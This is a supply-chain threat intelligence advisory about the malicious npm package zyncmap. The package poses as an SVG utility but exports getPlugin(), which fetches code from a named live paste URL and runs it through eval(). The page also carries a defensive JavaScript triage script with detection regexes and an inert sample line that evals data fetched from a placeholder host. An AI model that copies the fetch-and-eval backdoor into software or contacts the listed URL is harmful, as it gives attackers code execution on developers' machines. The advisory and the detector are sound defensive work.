Supply-chain threat intelligence

Incident detail

critical · npm · malware · osv

Malicious code in zyncmap (npm)

zyncmap

Risk score

92

AI summary

Indexed incident for zyncmap (npm).

Description

zyncmap@0.0.0 advertises itself as an SVG sanitization/minification utility, but index.js exports an undocumented function getPlugin() that, when invoked, performs an HTTP GET against the anonymous paste host https://www.jsonkeeper.com/b/3P9BF and passes the response's model string field directly to eval(). Content at that paste URL is attacker-mutable, so any consumer that calls the exported getPlugin() executes arbitrary attacker-controlled JavaScript in the installer's Node.js process. The README and ~80% of index.js implement plausible SVG helpers as cover; the remote-fetch+eval export and a misleading bearrtoken: "logo" header are appended separately and not mentioned in package documentation. This is a backdoor: a hidden code path giving the publisher persistent remote code execution against any consumer who reaches the export.
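As an added example (not code from the advisory or from the zyncmap package), a heuristic triage script for the backdoor shape described above: it flags source that both makes an outbound HTTP(S) request and passes data to eval()/new Function(), and lists CommonJS exports that the README never mentions. The sample package, its inert getPlugin() body and the placeholder URL are constructed for the demo.

```javascript
// Heuristic triage for the remote-fetch+eval backdoor shape.
// Assumptions: CommonJS source, README as plain text; regexes are deliberately
// coarse (a triage signal, not a parser). Sample data below is constructed.
const NETWORK_RE = /\b(?:https?\.(?:get|request)|fetch|axios(?:\.\w+)?)\s*\(/g;
const EVAL_RE = /\b(?:eval|new\s+Function)\s*\(/g;
const EXPORT_OBJ_RE = /module\.exports\s*=\s*\{([^}]*)\}/;
const EXPORT_PROP_RE = /\b(?:module\.)?exports\.(\w+)\s*=/g;

// Collect the names a CommonJS module exposes, from both export styles.
function exportedNames(source) {
  const names = new Set();
  const obj = source.match(EXPORT_OBJ_RE);
  if (obj) {
    for (const part of obj[1].split(',')) {
      const name = part.split(':')[0].trim(); // handles "name" and "name: value"
      if (name) names.add(name);
    }
  }
  for (const m of source.matchAll(EXPORT_PROP_RE)) names.add(m[1]);
  return [...names];
}

// Return findings for one package: [{ rule, detail }].
function triagePackage(pkg) {
  const findings = [];
  const network = pkg.source.match(NETWORK_RE) || [];
  const evals = pkg.source.match(EVAL_RE) || [];
  if (network.length > 0 && evals.length > 0) {
    findings.push({
      rule: 'remote-fetch-eval',
      detail: `${network.length} network call(s), ${evals.length} eval-like call(s)`,
    });
  }
  // Exports that the README never names: the cover-story check from the advisory.
  for (const name of exportedNames(pkg.source)) {
    if (!pkg.readme.includes(name)) findings.push({ rule: 'undocumented-export', detail: name });
  }
  return findings;
}

// Constructed sample mimicking the described pattern; inert (placeholder URL, no body).
const SAMPLE = {
  readme: '# svgmini\n\nUse `sanitizeSvg(svg)` and `minifySvg(svg)`.\n',
  source: [
    "const https = require('https');",
    'function sanitizeSvg(svg) { return svg.replace(/<script/gi, ""); }',
    'function minifySvg(svg) { return svg.trim(); }',
    "function getPlugin() { https.get('https://paste.example/PLACEHOLDER', res => { eval(data.model); }); }",
    'module.exports = { sanitizeSvg, minifySvg, getPlugin };',
  ].join('\n'),
};
```

Run it over an unpacked tarball's index.js and README before the package is allowed into a lockfile; a hit on both rules for the same file is worth a manual read.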

Technical details

Affected versions

  • =0.0.1
  • =0.0.0

Indicators

  • affected version =0.0.1 (75%)
  • affected version =0.0.0 (75%)

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg

Related incidents